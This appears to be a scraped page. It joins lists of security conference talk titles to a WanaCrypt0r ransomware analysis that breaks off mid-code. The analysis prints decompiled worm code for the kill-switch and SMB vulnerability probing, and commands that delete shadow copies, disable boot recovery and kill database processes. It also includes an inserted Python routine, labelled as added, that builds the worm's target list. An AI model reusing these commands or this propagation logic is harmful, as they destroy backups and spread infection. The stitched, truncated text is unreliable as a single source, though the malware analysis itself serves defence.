The Internet of Things: Vulns – Botnets and Detection – Kyle Stone (@essobi) – Liam Randall
The Malware Management Framework – a process you can use to find advanced malware. We found WinNTI with it! – Michael Gough and Ian Robertson
Hack the Hustle! – Eve Adams
Operationalizing Security Intelligence in the Enterprise- Rafal Los
New Shiny in the Metasploit Framework – egypt
Everything you ever wanted to know on how to start a Credit Union – but were afraid to ask. – Jordan Modell
A developer’s guide to pentesting – Bill Sempf
Steal All of the Databases. – Alejandro Caceres
Sandboxes from a pen tester’s view – Rahul Kashyap
iOS Reverse #=> iPWn Apps – Mano ‘dash4rk’ Paul
Terminal Cornucopia – Evan “treefort” Booth
Wait; How is All This Stuff Free?!? – Gene Bransfield

Track 5 – Hybrid Room     
Building An Information Security Awareness Program from Scratch – Bill Gardner – Valerie Thomas
Malware : testing malware scenarios on your network – Tony Huffman (@myne_us) – Juan Cortes (@kongo_86)
Password Intelligence Project – Advanced Password Recovery and Modern Mitigation Strategies – John Moore “Rabid Security”
Tizen Security: Hacking the new mobile OS – Mark Manning (AntiTree)
RAWR – Rapid Assessment of Web Resources – Adam Byers – Tom Moore
Decoding Bug Bounty Programs – Jon Rose
Patching Windows Executables with the Backdoor Factory – Joshua Pitts
Jason Scott – Defcon Documentary Q&A
Panel: Building and Growing a Hacker Space – Joey Maresca – Dave Marcus – Nick Farr – SkyDog
SO Hopelessly Broken: the implications of pervasive vulnerabilities in SOHO router products. – Jacob Holcomb
Put Me In Coach: How We Got Started In Infosec – pr1me – Chris “g11tch” Hodges – Frank Hackett – Dave “ReL1K” Kennedy
Alice Goes Deeper (Down the Rabbit Hole) – Redirection 2.0 – Nathan Magniez
Emergent Vulnerabilities: What ant colonies – schools of fish – and security have in common. – Nathaniel “Dr. Whom” Husted
Why Your IT Bytes – Frank J. Hackett
Using Facial Recognition Software In Digital Forensics And Information Security – Brian Lockrey
How to Fight a War Without Actually Starting One – Brendan O’Connor
Crypto-Exploit Exercises: A tool for reinforcing basic topics in Cryptography – Nancy Snoke

Stable Talks
Gen Y:Getting Them to Talk Rather than Text at Work – Nancy Kovanic
Battle Scars And Friendly Fire: Threat Research Team War Stories – Will Gragido and Seth Geftic
Unmasking Miscreants – Allison Nixon – Brandon Levene
gitDigger: Creating useful wordlists from public GitHub repositories – Jaime Filson (WiK)
PowerShell and Windows Throw the Best Shell Parties – Piotr Marszalik
Owning Computers Without Shell Access – Royce Davis
Sixnet Tools: for poking at Sixnet Things – Mehdi Sabraoui
Hardening Windows 8 apps for the Windows Store – Bill Sempf
Intro to Dynamic Access Control in Windows Server 2012 – Evan Anderson
Evolutionary Security – Embracing Failure to Attain “Good Enough” – Josh More
DIY Forensics: When Incident Response Morphs into Digital Forensics – John Sammons
ANOTHER Log to Analyze – Utilizing DNS to Discover Malware in Your Network – Nathan Magniez
Phishing Frenzy: 7 seconds from hook to sinker – Brandon <zeknox> McCann
Electronic Safe Fail: Common Vulnerabilities in Electronic Safes – Jeff Popio
The Good Samaritan Identity Protection Project  www.thegsipp.org – Zack Hibbard – Chris Brown and Jon Sternstein
Some defensive ideas from offensive guys. – Justin Elze and Robert Chuvala
Grim Trigger – Jeff “ghostnomad” Kirsch
A n00bie’s perspective on Pentesting… – Brandon Edmunds
My Security is a Graph – Your Argument is Invalid – Gabriel Bassett
Follow the Foolish Zebras: Finding Threats in Your Logs – Chris Larsen
Security Training and Research Cloud (STRC) – Jimmy Murphy
Passive Aggressive Defense – Jason Clark
So you want to be a pentester? – Raymond Gabler
Digital Energy – BPT – Paul Coggin
An Anti-Forensics Primer – Jason Andress
What if Petraeus was a hacker? Email privacy for the rest of us – Phil Cryer (@faker)
 

09/30/2013 Derbycon 3.0 Videos Tracks 1 & 2

I think I have all of tracks 1 and 2 posted; more to come.

Scanning Darkly - HD Moore (keynote)
Kinetic Pwnage: Obliterating the Line Between Computers and the Physical World - Ed Skoudis (keynote)
Look Ma - No Exploits! - The Recon-ng Framework - Tim “LaNMaSteR53” Tomes
Practical Exploitation Using A Malicious Service Set Identifier (SSID) - Deral Heiland
JTAGulator: Assisted discovery of on-chip debug interfaces - Joe Grand
Seeing red in your future? - Ian Amit
TMI: How to attack SharePoint servers and tools to make it easier - Kevin Johnson and James Jardine
The High Risk of Low Risk Applications - conrad reynolds
It’s Okay to Touch Yourself - Ben Ten (Ben0xA)
Collaborative Penetration Testing With Lair - Tom Steele and Dan Kottmann
Malware Automation - Christopher Elisan
What’s common in Oracle and Samsung? They tried to think differently about crypto. - László Tóth - Ferenc Spala
Burning the Enterprise with BYOD - Georgia Weidman
Getting the goods with smbexec - Eric Milam(brav0hax) and Martin Bos (purehate)
Shattering the Glass: Crafting Post Exploitation Tools with PowerShell - Matt Johnson
Cheat Codez: Level UP Your SE Game - Eric Smith
My Experiments with truth: a different route to bug-hunting - Devesh Bhatt
The Art and Science of Hacking Any Organization - Tyler Wrightson
Living Off the Land: A Minimalist’s Guide to Windows Post-Exploitation - Christopher Campbell & Matthew Graeber
Cracking Corporate Passwords - Exploiting Password Policy Weaknesses - Minga / Rick Redman
Ownage From Userland: Process Puppeteering - Nick Cano
) UNION SELECT `This_Talk` AS (‘New Exploitation and Obfuscation Techniques’)%00 - Roberto Salgado
Exploiting_the_Zeroth_Hour(); Developing your Advanced Persistent Threat to Pwn the Network - SOLOMON SONYA and NICK KULESZA
Phishing Like The Pros - Luis “Connection” Santana
Raspberry Pi - Media Centers - and AppleTV - David Schuetz
Cognitive Injection: Reprogramming the Situation-Oriented Human OS - Andy Ellis
IOCAware - Actively Collect Compromise Indicators and Test Your Entire Enterprise - Matt Jezorek and Dennis Kuntz
Cash is King: Who’s Wearing Your Crown? - Tom Eston and Spencer McIntyre
Security Sucks - and You’re Wearing a Nursing Bra - Paul Asadoorian
Windows Attacks: AT is the new black - Rob Fuller and Chris Gates
How Good is Your Phish - @sonofshirt
Identifying Evil: An introduction to Reverse Engineering Malware and other software - Bart ‘d4ncind4n’ Hopper
How Im going to own your organization in just a few days. - RazorEQX
Pass-The-Hash 2: The Admin’s Revenge - Skip Duckwall and Chris Campbell
The Cavalry Is Us: Protecting the public good and our profession - Josh Corman
Love letters to Frank Abagnale (How do I pwn thee let me count the ways) - Jayson E. Street
The Message and The Messenger - James Arlen
50 Shades of RED: Stories from the "Playroom" - Chris Nickerson
Beyond Information Warfare “You Ain’t Seen Nothing Yet” - Winn Schwartau
Stop Fighting Anti-Virus - Integgroll
How the Grid Will Be Hacked - Josh Axelrod and Matt Davis
help for the helpdesk - Mick Douglas
Weaponizing your Coffee Pot - Daniel Buentello
Practical OSINT - Shane MacDougall (NOTE THAT THIS IS AN ADULT ONLY TALK - 18+ or older)
Stop making excuses; it’s time to own your HIV (High Impact Vulnerabilities) - Jack D. Nichelson
Uncloaking IP Addresses on IRC - Derek Callaway


          BSidesLV 2013 Videos        
Videos: http://www.irongeek.com/i.php?page=videos/bsideslasvegas2013/mainlist
These are the videos from the BSides Las Vegas conference. Thanks to all of the BSides Crew for having me out to help record and render the videos. @bsideslv, @banasidhe, @kickfroggy, @quadling, @jack_daniel 

"The Security Industry - How to Survive Becoming Management" - Christien Rioux

Discovering Dark Matter: Towards better Android Malware Heuristics - Jimmy Shah, David Shaw, Matt Dewitt

Mom! I Broke My Insulin Pump... Again! - Jay "Rad" Radcliffe

Dungeons & Dragons, Siege Warfare, and Fantasy Defense in Depth - Evan Davidson and Noah Schiffman

HiveMind: Distributed File Storage Using JavaScript Botnets - Sean Malone

gitDigger: Creating useful wordlists from public GitHub repositories - WiK and Mubix

Collaborative Penetration Testing With Lair - Tom Steele and Dan Kottmann

Social Aftermath Responding to Social Pwnage - Steven F. Fox

Silence Equals Death - Violet Blue

The Cavalry Isn't Coming: Starting the Revolution to Fsck it All! - Nicholas J. Percoco and Joshua Corman

A Fire In The Eye - Olli-Pekka Niemi and Antti Levomaki

Defense Evasion Modeling - Frank Artes

"Malware Management Framework" - We detected WinNTI with it! - Michael Gough

Crunching the Top 10,000 Websites' Password Policies and Controls - Steve Werby

Governments and UFOs: A Historical Analysis of Disinformation and Deception - Richard Thieme

Strange interactions in personal data: Brokers and the CFAA - Christine Dudley

Diamonds, Fitness and Cults: Manipulation for Fun and Profit - Katie Rodzon

Vulnerability & Exploit Trends: A Deep Look Inside The Data - Ed Bellis, Michael Roytman

EC2 or Bust - How to Build Your Own Pen Testing Lab in Amazon EC2 - Grecs

Techniques for Escaping the AppSec Labyrinth - Andrew Hay

The Erudite Inebriate's Guide to Life, Liberty, and the Purfuit of Happinefs - Jack Daniel

Hack the Hustle! Career Strategies for Information Security Professionals - Eve Adams

Information Sharing, or "I've got 99 problems and they're probably pretty similar to yours" - Chris Mills

Convincing Your Management, Your Peers, and Yourself That Risk Management Doesn't Suck - Josh Sokol

How embracing social media helped me stop the hackers, save the world and get the girl! - Javvad Malik

Malware Automation - Christopher Elisan

Popping the Penguin: An Introduction to the Principles of Linux Persistence - Mark Kita

Network Survival WCS - James Costello

The Slings and Arrows of Open Source Security - Tod Beardsley and Mister X

What if Petraeus was a hacker? Email privacy for the rest of us - Fak3r

Never Mind Your Diet, Cut the Crap From Your Vocabulary - Keli Hay (Brian Martin)

The 7 habits of highly effective CISOs - Franklin Tallah (Wendy Nather)

The Little Dutch Boy - D0n Quix0te (Bill E. Ghote)

Stop Shooting Blanks: No magic bullets in your arsenal - Renegade6 (Nicolle Neulist)

Flameout - Burnout Supernova - Dan Ward (Ally Miller)

The Sensual Side of 3D Printing - Kat Sweet (Javvad Malik)

Fun with WebSockets using Socket Puppet - Mister Glass (Weasel)

Using Machine Learning to Support Information Security - Alex Pinto (Joel Wilbanks)

The Truth, You Thought We Wouldn't Know? - Wolf Flight (Terry Gold)

Vulnerabilities in Application Whitelisting: Malware Case Studies - Jared Sperli and Joe Kovacic (J0hnny Brav0)

The Goodness is Baked In: Baking Assurance into Software - Ebony (Davi Ottenheimer)

Matriux Leandros:An Open Source Penetration Testing and Forensic Distribution - Prajwal Panchmahalkar (Savant42)

Sixteen Colors: Archiving the Evolution of ANSI and ASCII Art - Doug Moore (Brendan O'Connor)

You Are Being Watched! - Bharat Jogi

Calling All Researchers: A Discussion on Building a Security Research Framework - Michael "DrBearSec" Smith

Evil Empire: SIEM FTW - EggDropX and Tha CheezMan

Attribution Shmatribution! FIX YOUR SHIT! - Krypt3ia

Breach Panel - Davi Ottenheimer, Raymond Umerley, Jack Daniel, Steve Werby, David Mortman & George V. Hulme

Roll-your-own Lightning Talks

Attacking and Defending Full Disk Encryption - Tom Kopchak

Say It to My Face - Shannon Sistrunk

Alex Dreams of Risk: How the Concept of Being a Craftsman can Help you Find Meaning and Avoid Burnout - Alex Hutton

You can't make people act more securely, you can help them want to. - Ivan Campbell and Twyla Campbell


WanaCrypt0r Ransomworm
Written by Sergei Shevchenko and Adrian Nish
BACKGROUND

Since the release of the ETERNALBLUE exploit by ‘The Shadow Brokers’ last month security researchers have been watching for a mass attack on global networks. This came on Friday 12th May when it was bundled with ransomware called WanaCrypt0r and let loose. Initial reports of attacks were highlighted by Telefonica in Spain but the malware quickly spread to networks in the UK where the National Health Service (NHS) was impacted, followed by many other networks across the world.

The infographic below illustrates the key components of the WanaCrypt0r ransomware. This is described in further detail in subsequent sections of this report along with initial clues on attribution.


ANALYSIS: Initial Vector

The initial infection vector is still unknown. Reports by some researchers of phishing emails have been dismissed by others as relating only to a different (unrelated) ransomware campaign, called Jaff.

There is also a working theory that initial compromise may have come from SMB shares exposed to the public internet. Results from Shodan show over 1.5 million devices with port 445 open – the attacker could have infected those shares directly.

The Dropper/Worm

The infection starts from a 3.6Mb executable file named mssecsvc.exe or lhdfrgui.exe. Depending on how it's executed, it can function as a dropper or as a worm.

When run, the executable first checks if it can connect to the following URL:

http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea[.]com

The connection is checked with the WinINet functions, shown below:

qmemcpy(&szUrl,
        "http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea[.]com",
        57u);
h1 = InternetOpenA(0, INTERNET_OPEN_TYPE_DIRECT, 0, 0, 0);
h2 = InternetOpenUrlA(h1, &szUrl, 0, 0,
                      INTERNET_FLAG_RELOAD | INTERNET_FLAG_NO_CACHE_WRITE,
                      0);
if (h2)
{
  InternetCloseHandle(h1);     // if connection succeeds, then quit
  InternetCloseHandle(h2);
  result = 0;
}
else
{
  InternetCloseHandle(h1);     // if connection fails
  InternetCloseHandle(0);
  PAYLOAD();                   // then call the payload
  result = 0;
}
return result;

That means that if the executable is unable to connect to the URL above, it will call the payload. In other words, the payload activates on any system that cannot reach the Internet, such as an air-gapped system within a hospital network.

It is also worth noting that this connection check is not proxy aware, so in an enterprise IT environment it is unlikely to reach the domain, which triggers the payload.

If the executable is run with no command line parameters, it will register and then run itself as a service:

Service name: "mssecsvc2.0"
Service Description: "Microsoft Security Center (2.0) Service"
Service executable: "%ORIGINAL_NAME% -m security"

where %ORIGINAL_NAME% is the original name of the executable, such as mssecsvc.exe or lhdfrgui.exe.

Next, it will start the created service. The payload of the executable will load its own resource called "R/1831", and save it as:

c:\windows\tasksche.exe

The original c:\windows\tasksche.exe file is renamed to c:\windows\qeriuwjhrf.

Finally, the executable will execute the dropped resource as:

"c:\windows\tasksche.exe /i"

If this executable is started as a service, its service handling procedure will invoke a network replication code, explained below.

EternalBlue Port

Since the Shadow Brokers leaked the EquationGroup / NSA FuzzBunch software, a researcher with the handle @zerosum0x0 has reverse engineered the ETERNALBLUE SMBv1/SMBv2 exploit against Windows Server 2008 R2 SP1 x64. This was released on 21st April 2017.

As @zerosum0x0 predicted:

“Every major malware family, from botnets to ransomware to banking spyware, will eventually add the exploits in the FuzzBunch toolkit to their arsenal. This payload is simply a mechanism to load more malware with full system privileges... This is a jewel compared to the scraps that were given to Stuxnet. It comes in a more dangerous era than the days of Conficker. Given the persistence of the missing MS08-067 patch, we could be in store for a decade of breaches emanating from MS17-010 exploits. It is the perfect storm for one of the most damaging malware infections in computing history.”

This work was further expanded on with an open-source project "MS17-010 Windows SMB RCE", developed by RiskSense Operations, and includes both a Metasploit scanner and a Python port.

On 9th of May 2017, the Python port was further improved to "Store original shellcode in binary, rather than python string representation".

In order to "Make it faster", the shellcode was now declared as binary, further lowering the barrier of porting it into C++ code.

It appears that the ransomware took advantage of the published Python source, along with the shellcode binaries – the SMB structures found in the ransomware are identical to the published ones (e.g. the “Exploits” section of this project was used to infect remote hosts with DOUBLEPULSAR backdoor). The published raw SMB packets appear to be copy-pasted into C++ code, and then recompiled using ported blobs – most likely without even understanding how the EternalBlue SMBv1/SMBv2 exploit actually works.

A detailed description of the network replication and worm functionality is given in Appendix B.

The Payload

The payload is a 3.4Mb file called tasksche.exe, created from the worm's resource "1831". Such a large size is explained by the bundled TOR executables along with other tools and configuration files.

The internal name of this executable is diskpart.exe.

This file contains another embedded resource, named "XIA/2058". This resource is a ZIP file.


If the file detects it was executed without the "/i" switch (that is, it was not executed by the worm), it will register itself as a service, giving itself a persistence mechanism that does not require the worm.

For that, it will first generate a pseudo-random name that is derived from the current computer name. For example:

tdyhddeaprj852

Next, it will create read-only directories, and copy itself into those directories, such as:

  •  c:\ProgramData\%RANDOM_NAME%\%EXE_NAME%
  •  c:\Intel\%RANDOM_NAME%\%EXE_NAME%

where %RANDOM_NAME% is the previously generated pseudo-random name, and %EXE_NAME% is the name of its own executable.

For example:

  •  c:\ProgramData\tdyhddeaprj852\tasksche.exe
  •  c:\Intel\tdyhddeaprj852\tasksche.exe

Next, it will create a new service:

Service name: %RANDOM_NAME%
Service Description: %RANDOM_NAME%
Service executable: "cmd.exe /c %FULL_PATH_FILENAME%"

where %FULL_PATH_FILENAME% is the full path filename of the malicious executable.

Following this, it starts the service or directly runs the newly created executable as:

"cmd.exe /c %FULL_PATH_FILENAME%"

To make sure there is only one copy of the executable running, it relies on a mutex named:

"Global\MsWinZonesCacheCounterMutexA"

Encryption Phase

The malware then proceeds to its file encryption phase.

It will register its working directory in the registry value:

HKLM\SOFTWARE\WanaCrypt0r\wd: "%WORKING_DIR%"

Next, it will unzip its embedded resource "XIA/2058" into the working directory, using ZIP password "WNcry@2ol7".

This will create a number of files, such as a command line TOR executable, required libraries, ransom messages in various languages, and other tools:

  •  b.wnry – a bitmap image with the ransom note in it
  •  c.wnry – binary configuration file
  •  r.wnry – a text file with the ransom note in it
  •  s.wnry – a ZIP file with the command line TOR executable and required libraries
  •  t.wnry – encrypted ransomware DLL
  •  taskdl.exe – an executable that enumerates and deletes temp files on each drive, looking for files with the .WNCRYT extension in %DRIVE%:\$RECYCLE and %TEMP% directories
  •  taskse.exe – an executable that starts @WanaDecryptor@.exe
  •  u.wnry – the ransomware's decryptor executable, which opens a GUI with a ransom note in it
  •  msg\m_*.wnry – a directory with ransom notes in different languages

It will then read the unzipped configuration file c.wnry – this file contains the following list of .onion domains:

gx7ekbenv2riucmf.onion
57g7spgrzlojinas.onion
xxlvbrloxvriy2c5.onion
76jdd2ir2embyv47.onion
cwwnhwhlz52maqm7.onion

Next, it picks up a random Bitcoin address out of three hard-coded ones – the list below shows the balances at the time of analysis:

13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94 - 15.13562354 BTC = $26410
12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw - 13.78022431 BTC = $24045
115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn - 5.98851225 BTC = $17361

Hence, the total amount of the collected ransom at the time of writing is ~USD$68K.

The selected Bitcoin address is then saved back into c.wnry file. Thus, the purpose of this file is to store configuration.

Next, the ransomware runs the following commands to set the 'hidden' attribute on all of its files and to grant full access rights to all users:

"attrib +h ."
"icacls . /grant Everyone:F /T /C /Q"

It then imports a 2048-bit public RSA key from a hard-coded 1,172-byte blob, stored within the executable. Next, it reads the unzipped resource file t.wnry that starts from a "WANACRY!" marker, and decrypts an AES key from here, using an RSA public key.

The recovered AES key is then used to decrypt the rest of t.wnry file contents, using AES-128 (CBC).

The blob decrypted from t.wnry turns out to be a PE file: the malware parses its PE header, loads it into newly allocated memory, and calls its entry point.

This PE file is a DLL, and the called entry point corresponds to its DllEntryPoint() export.

The internal name of this DLL is kbdlv.dll. The malware locates and then calls its export TaskStart().

The Ransomware DLL

The main DLL module of the ransomware has an internal name kbdlv.dll. Its export TaskStart() is called to invoke the ransomware’s file encryption logic.

The DLL first creates a mutex "MsWinZonesCacheCounterMutexA" to make sure there is only one copy of ransomware activated. Next, it reads c.wnry - a configuration file that stores the list of TOR services.

The ransomware will attempt to terminate a number of processes, such as SQL server and MS Exchange server, by running commands:

taskkill.exe /f /im mysqld.exe
taskkill.exe /f /im sqlwriter.exe
taskkill.exe /f /im sqlserver.exe
taskkill.exe /f /im MSExchange*
taskkill.exe /f /im Microsoft.Exchange.*

It will then spawn a number of threads, including a file encryption thread.

It will not attempt to encrypt files within directories whose names contain the following strings:

  •  \Intel
  •  \ProgramData
  •  \WINDOWS
  •  \Program Files
  •  \Program Files (x86)
  •  \AppData\Local\Temp
  •  \Local Settings\Temp
  •  This folder protects against ransomware. Modifying it will reduce protection
  •  Temporary Internet Files
  •  Content.IE5

Before the encrypted files are written, the ransomware checks the free disk space with GetDiskFreeSpaceExW() to make sure it does not run out of free space.

Finally, the DLL creates a copy of the previously unzipped file u.wnry, saving it as @WanaDecryptor@.exe and then running it.

The Ransomware EXE

The EXE module @WanaDecryptor@.exe is run by the DLL (a copy of the previously unzipped file u.wnry). It is a GUI application with the window name being "Wana Decrypt0r 2.0".

To delete Windows shadow copies, it runs the commands:

cmd.exe /c vssadmin delete shadows /all /quiet &
wmic shadowcopy delete &
bcdedit /set {default} bootstatuspolicy ignoreallfailures &
bcdedit /set {default} recoveryenabled no &
wbadmin delete catalog -quiet

This executable will connect to C&C via TOR .onion domains, in order to anonymise its C&C traffic.

Once the ransom is paid, the executable is able to check the status of the payment, and allow file decryption.

Attribution

The WanaCrypt0r ransomware released on 12th May is not the only version. Earlier this year, there was another version released (example MD5: 9c7c7149387a1c79679a87dd1ba755bc).

The older version has a timestamp of 9th February 2017, and was first submitted to VirusTotal on 10th February 2017.

Similar to the latest version, it also relies on external files, except that the extension used is .wry instead of .wnry:

  •  n.wry
  •  cg.wry
  •  t1.wry
  •  t2.wry

The latest version downloads a TOR client from:
https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip

The older version downloads a TOR client from:
https://www.torproject.org/dist/torbrowser/6.0.8/tor-win32-0.2.8.11.zip

Both the old and the new version extract the ZIP file into the TaskData folder.

It's worth noting that the older variant of ransomware also attempted to replicate across \\%IP%\ipc$ network shares. Hence, the idea of the network replication was brewing in the attackers' minds long before 'The Shadow Brokers' release.

The older version of WanaCrypt0r ransomware relies on a function that generates a random buffer, using an internal table that consists of 75 WORDs:

The implementation of this function is unique: it cannot be found in any legitimate software. The only other sample in which this function can also be found (almost identical, but with minor tweaks) is a sample of the Contopee backdoor (MD5: ac21c8ad899727137c4b94458d7aa8d8), first submitted to VirusTotal on 15th August 2015.

This code overlap was first noticed and tweeted by Google researcher Neel Mehta. This was quickly followed up on by Kaspersky Labs in a blogpost.

The Contopee backdoor sample uses this function as part of its communication protocol with the C&C server. This backdoor family is a tool from the Lazarus threat actors.

The re-use of code is a characteristic of the Lazarus group that we noted in our report last year on attacks against SWIFT systems. This re-use is at the source-code level, providing strong evidence of a common development environment.

This, along with other overlaps with Lazarus’ previous campaigns is described below:

Characteristic | Lazarus code example | WanaCrypt0r example
Random buffer generator function | August 2015, Contopee backdoor: ac21c8ad899727137c4b94458d7aa8d8 | January 2017, WanaCrypt0r: 9c7c7149387a1c79679a87dd1ba755bc
Code / Compiler | C++ / Visual Studio 6.0 | C++ / Visual Studio 6.0
'leetspeak' | y0uar3@s!llyid!07 (referenced in the US-CERT alert following the SONY attack) | WANACRY!, WNcry@2ol7
CryptoCurrency | Lazarus has targeted Bitcoin related companies in recent months – possibly looking for ways to steal/launder funds. A watering-hole (same as described in our blog) was set up in February on a popular Bitcoin website. | WanaCrypt0r uses Bitcoin addresses to receive ransom payments.

As noted in our attribution post last year, use of Visual Studio 6.0 is not a significant observation on its own – however, this development environment dates from 1998 and is rarely used by malware coders. Nonetheless, it has been seen repeatedly with Lazarus attacks.

CONCLUSIONS

Coupling an SMB worm to ransomware has created a highly effective threat – albeit one which wreaks havoc for relatively little monetary gain. Even though $68K may represent a modest profit for the attackers, moving the money from those bitcoin wallets will attract significant attention from law-enforcement and could identify their money-laundering networks. It is very likely they will not get their hands on any money once this is all over.

Whilst the SMB worm code has been copy/pasted from elsewhere, the ransomware author is clearly an experienced malware developer. They include checks such as file paths of anti-ransomware products to avoid detection of their operation. There are mistakes though, such as the "kill-switch" which has been widely discussed. Assuming they used the Python port of the code released on 9th May, it implies a very short turnaround between development and attack; it is therefore possible the worm got loose whilst the code was still in testing. Either way, the attackers will learn from this campaign, and may return with updated code whilst vulnerabilities remain unpatched.

The linkages to the Lazarus campaign are tantalising clues as to who may be ultimately behind this. Following on from last year's attacks on SWIFT systems and this year's attacks on banks in Poland & Mexico they continue to demonstrate that they are a considerable menace to network defenders. Understanding their tools, techniques and procedures is challenging given the shifting nature of attacks seen, however deserves maximum focus and co-operation across the security community.

The biggest lesson to be learned from this attack though is the on-going challenge which organisations running critical infrastructure face with patching. This isn’t the first case of self-propagating malware impacting healthcare networks we’ve investigated; indeed this reminds us a lot of the QBot/Qakbot episode last year. Then, as now, hospitals are exposed by running on out-of-date systems and with minimal resources to spend on security. The WanaCrypt0r campaign has brought this to international attention – how to fix the problem going forward will need swift debate among technology experts and policy makers to avert similar crises in future.

RECOMMENDATIONS

  •  Install patch MS17-010 as a matter of urgency. For out-of-support operating systems such as XP, Win8 and Server 2003, apply the out-of-band patch.
  •  Add the following SNORT rules to IDS devices:
     http://doc.emergingthreats.net/bin/view/Main/2024218
  •  Block all outgoing connections on ports 137, 139, 445 and 3389 (i.e. internal to external) to stop the worm spreading externally.
  •  Block all incoming connections on ports 137, 139, 445 and 3389 (i.e. external to internal) to stop the worm coming into the network.
  •  Consider blocking connections on port 445 (SMB shares) internally if not business critical until the worm has subsided.
  •  Ensure that connections to the domain www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea[.]com are permitted. This site is reported to act as a kill switch for some variants, preventing encryption. Connectivity can be tested with the following python script.

We also suggest noting the recommendations from:

APPENDIX A – Indicators of compromise

C&C Domain
gx7ekbenv2riucmf[.]onion
57g7spgrzlojinas[.]onion
xxlvbrloxvriy2c5[.]onion
76jdd2ir2embyv47[.]onion
cwwnhwhlz52maqm7[.]onion
iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea[.]com

APPENDIX B – The Network Replicator

The worm replicates across the network using two threads: the first one provides replication across the local network, and the second one - across random IP ranges, thus affecting external addresses (such as honeypots or other exposed SMB shares).

To replicate across the internal network, the worm first calls GetAdaptersInfo() to obtain the network configuration of each network adapter associated with the system.

The network configuration allows it to use current IP address and mask to build a list of local IP addresses.

For example, if the local IP address is 192.168.78.132, and the subnet mask is 255.255.255.0, the worm may build a list of 254 IP addresses that are displayed below in their binary format, such as 014EA8C0 ("192.168.78.1"), 024EA8C0 ("192.168.78.2"), and up to FE4EA8C0 ("192.168.78.254"):


NOTE: the constructed list is trailed with the BAADF00D markers.

This list is then passed to a newly spawned thread to enumerate it, and the worm will then attempt to replicate to each target in the list.
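The local target list described above, as an added Python illustration (not code from the report): it builds the list from the adapter's address and mask, renders entries the way the dump shows them, and decodes such a buffer back into addresses as an analyst would when reading it out of memory. It assumes the BAADF00D trailer is stored as one little-endian DWORD, which the report does not state.

```python
import ipaddress
import struct

# The dump shows each entry as the DWORD value a debugger prints (014EA8C0 for
# 192.168.78.1): inet_addr() stores the address in network byte order, so reading
# those four bytes as a little-endian DWORD reverses them. The BAADF00D trailer is
# assumed here to be stored as one little-endian DWORD; the report gives only its value.
END_MARKER = 0xBAADF00D


def local_targets(ip, mask):
    """Every host address on the local subnet, as the first replication thread builds it."""
    net = ipaddress.IPv4Network((ip, mask), strict=False)
    return [str(h) for h in net.hosts()]


def as_dword_hex(ip):
    """Render an address the way the dump does: its in_addr bytes read as an LE DWORD."""
    value, = struct.unpack("<I", ipaddress.IPv4Address(ip).packed)
    return f"{value:08X}"


def encode_target_list(ips):
    """Lay the list out as in memory: in_addr values back to back, closed by the marker."""
    body = b"".join(ipaddress.IPv4Address(ip).packed for ip in ips)
    return body + struct.pack("<I", END_MARKER)


def decode_target_list(blob):
    """Recover the addresses from a dumped buffer, stopping at the first BAADF00D marker."""
    ips = []
    for off in range(0, len(blob) - 3, 4):
        chunk = blob[off:off + 4]
        if struct.unpack("<I", chunk)[0] == END_MARKER:
            return ips
        ips.append(str(ipaddress.IPv4Address(chunk)))
    raise ValueError("buffer is not terminated by a BAADF00D marker")


if __name__ == "__main__":
    targets = local_targets("192.168.78.132", "255.255.255.0")
    print(len(targets), "targets:", as_dword_hex(targets[0]), "...", as_dword_hex(targets[-1]))
    blob = encode_target_list(targets)   # constructed buffer in the shape of the worm's list
    print("decoded back:", decode_target_list(blob) == targets)
```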

The second network replication thread is spawned every 2 seconds, up to 128 times. Each instance of this thread will generate a random IP consisting of 4 octets:

IP1.IP2.IP3.IP4

Each octet is a random value from 0 to 255, generated using CryptGenRandom() API - a cryptographically secure pseudorandom number generator.

The first octet IP1 cannot be 127, 224, or 225. If the worm is able to connect to a target with IP address IP1.IP2.IP3.IP4 over port 445, it will then enumerate 255 IP addresses from IP1.IP2.IP3.1 to IP1.IP2.IP3.255. The worm will attempt to replicate to each enumerated target.

This thread is spawned 128 times; the round number is passed to the thread as an argument, so it is aware of the current round of its own execution. The thread uses it along with an internal timer (using 20 and 40 minute intervals) to define the logic for regenerating the IP1 and IP2 parts of the random IPs.

Both threads rely on the same network propagation mechanism: for each target IP, the worm first attempts to connect on port 445 and submit two SMB requests, attempting to establish whether the MS17-010 SMB vulnerability exists:

  •  negotiate_proto_request
  •  session_setup_andx_request

The code below shows how these packets are submitted:

  name.sa_family = 2;
  *(_DWORD *)&name.sa_data[2] = inet_addr(cp);
  *(_WORD *)&name.sa_data[0] = htons(hostshort);
  hSocket = socket(2, 1, 0);
  __hSocket = hSocket;
  if ( hSocket != -1 )
  {
    if ( connect(hSocket, &name, 16) != -1
      && send(__hSocket, negotiate_proto_request, 88, 0) != -1
      && recv(__hSocket, &buf, 1024, 0) != -1
      && send(__hSocket, session_setup_andx_request, 103, 0) != -1
      && recv(__hSocket, &buf, 1024, 0) != -1 )

On the network level, Wireshark recognises these two packets as Negotiate Protocol Request and Session Setup AndX Request.

Negotiate Protocol Request:

Session Setup AndX Request:

The disassembled source of the worm shows how the Negotiate Protocol Request is built:

The disassembled source shows the Session Setup AndX Request (only the end of it is shown):


The Session Setup AndX Request will get a response, and the code parses it to extract the native_os field from it.

Following this, the worm composes an IPC share name such as:

\\%IP_ADDRESS%\IPC

Next, the ransomware submits two other SMB requests:

  •  tree_connect_andx_request
  •  peeknamedpipe_request

First, the Tree Connect AndX Request:

Once the host responds, the code will read tree_id, process_id, user_id, and multiplex_id, in order to construct a new SMB request. In that new request, the following placeholders within the request templates will be replaced with the extracted values:

  •  __TREEID__PLACEHOLDER__
  •  __USERID__PLACEHOLDER__
  •  __TREEPATH_REPLACE__

The PeekNamedPipe Request is then submitted, recognised in Wireshark as:

The SMB header extracted from the received response is then parsed to see if nt_status contained in it equals 0x0C000205. Here is how the malware parses the four bytes of such status (bytes 05, 02, 00, 0C):

if (send(__hSocket, peeknamedpipe_request, 78, 0) != -1 // if sent
    && recv(__hSocket, &buf, 1024, 0) != -1 // and recv() is Ok
    && nt_status_0 == 5                // and nt_status byte #0=05
    && nt_status_1 == 2                // and nt_status byte #1=02
    && !nt_status_2                    // and nt_status byte #2=00
